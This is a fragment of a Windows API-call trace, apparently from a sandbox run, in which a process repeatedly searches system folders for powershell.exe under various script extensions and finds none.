	[0122.868] SetErrorMode (uMode=0x1) returned 0x1
	[0122.868] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.868] SetErrorMode (uMode=0x1) returned 0x1
	[0122.868] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psd1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.869] SetErrorMode (uMode=0x1) returned 0x1
	[0122.870] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.870] SetErrorMode (uMode=0x1) returned 0x1
	[0122.870] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.COM", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.871] SetErrorMode (uMode=0x1) returned 0x1
	[0122.872] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.872] SetErrorMode (uMode=0x1) returned 0x1
	[0122.872] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.EXE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.873] SetErrorMode (uMode=0x1) returned 0x1
	[0122.873] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.874] SetErrorMode (uMode=0x1) returned 0x1
	[0122.874] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.BAT", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.874] SetErrorMode (uMode=0x1) returned 0x1
	[0122.875] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.875] SetErrorMode (uMode=0x1) returned 0x1
	[0122.875] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.CMD", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.876] SetErrorMode (uMode=0x1) returned 0x1
	[0122.876] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.876] SetErrorMode (uMode=0x1) returned 0x1
	[0122.876] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBS", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.877] SetErrorMode (uMode=0x1) returned 0x1
	[0122.877] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.877] SetErrorMode (uMode=0x1) returned 0x1
	[0122.877] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.878] SetErrorMode (uMode=0x1) returned 0x1
	[0122.878] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.879] SetErrorMode (uMode=0x1) returned 0x1
	[0122.879] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JS", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.879] SetErrorMode (uMode=0x1) returned 0x1
	[0122.880] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.880] SetErrorMode (uMode=0x1) returned 0x1
	[0122.880] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JSE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.881] SetErrorMode (uMode=0x1) returned 0x1
	[0122.881] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.881] SetErrorMode (uMode=0x1) returned 0x1
	[0122.881] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSF", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.882] SetErrorMode (uMode=0x1) returned 0x1
	[0122.882] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.882] SetErrorMode (uMode=0x1) returned 0x1
	[0122.883] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSH", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.883] SetErrorMode (uMode=0x1) returned 0x1
	[0122.884] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.884] SetErrorMode (uMode=0x1) returned 0x1
	[0122.884] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.MSC", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.885] SetErrorMode (uMode=0x1) returned 0x1
	[0122.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.885] SetErrorMode (uMode=0x1) returned 0x1
	[0122.885] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.886] SetErrorMode (uMode=0x1) returned 0x1
	[0122.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.886] SetErrorMode (uMode=0x1) returned 0x1
	[0122.886] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.ps1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.886] SetErrorMode (uMode=0x1) returned 0x1
	[0122.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.887] SetErrorMode (uMode=0x1) returned 0x1
	[0122.887] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psm1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.887] SetErrorMode (uMode=0x1) returned 0x1
	[0122.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.887] SetErrorMode (uMode=0x1) returned 0x1
	[0122.887] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psd1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.887] SetErrorMode (uMode=0x1) returned 0x1
	[0122.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.888] SetErrorMode (uMode=0x1) returned 0x1
	[0122.888] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.COM", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.888] SetErrorMode (uMode=0x1) returned 0x1
	[0122.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.888] SetErrorMode (uMode=0x1) returned 0x1
	[0122.888] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.EXE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.889] SetErrorMode (uMode=0x1) returned 0x1
	[0122.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.889] SetErrorMode (uMode=0x1) returned 0x1
	[0122.889] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.BAT", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.889] SetErrorMode (uMode=0x1) returned 0x1
	[0122.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.889] SetErrorMode (uMode=0x1) returned 0x1
	[0122.890] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.CMD", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.890] SetErrorMode (uMode=0x1) returned 0x1
	[0122.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.890] SetErrorMode (uMode=0x1) returned 0x1
	[0122.890] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBS", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.890] SetErrorMode (uMode=0x1) returned 0x1
	[0122.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.891] SetErrorMode (uMode=0x1) returned 0x1
	[0122.891] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.891] SetErrorMode (uMode=0x1) returned 0x1
	[0122.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.891] SetErrorMode (uMode=0x1) returned 0x1
	[0122.891] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JS", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.891] SetErrorMode (uMode=0x1) returned 0x1
	[0122.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.892] SetErrorMode (uMode=0x1) returned 0x1
	[0122.892] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JSE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.892] SetErrorMode (uMode=0x1) returned 0x1
	[0122.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.892] SetErrorMode (uMode=0x1) returned 0x1
	[0122.892] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSF", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.893] SetErrorMode (uMode=0x1) returned 0x1
	[0122.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.893] SetErrorMode (uMode=0x1) returned 0x1
	[0122.893] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSH", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.893] SetErrorMode (uMode=0x1) returned 0x1
	[0122.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0122.893] SetErrorMode (uMode=0x1) returned 0x1
	[0122.893] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.MSC", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.894] SetErrorMode (uMode=0x1) returned 0x1
	[0122.894] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.894] SetErrorMode (uMode=0x1) returned 0x1
	[0122.894] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.894] SetErrorMode (uMode=0x1) returned 0x1
	[0122.894] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.895] SetErrorMode (uMode=0x1) returned 0x1
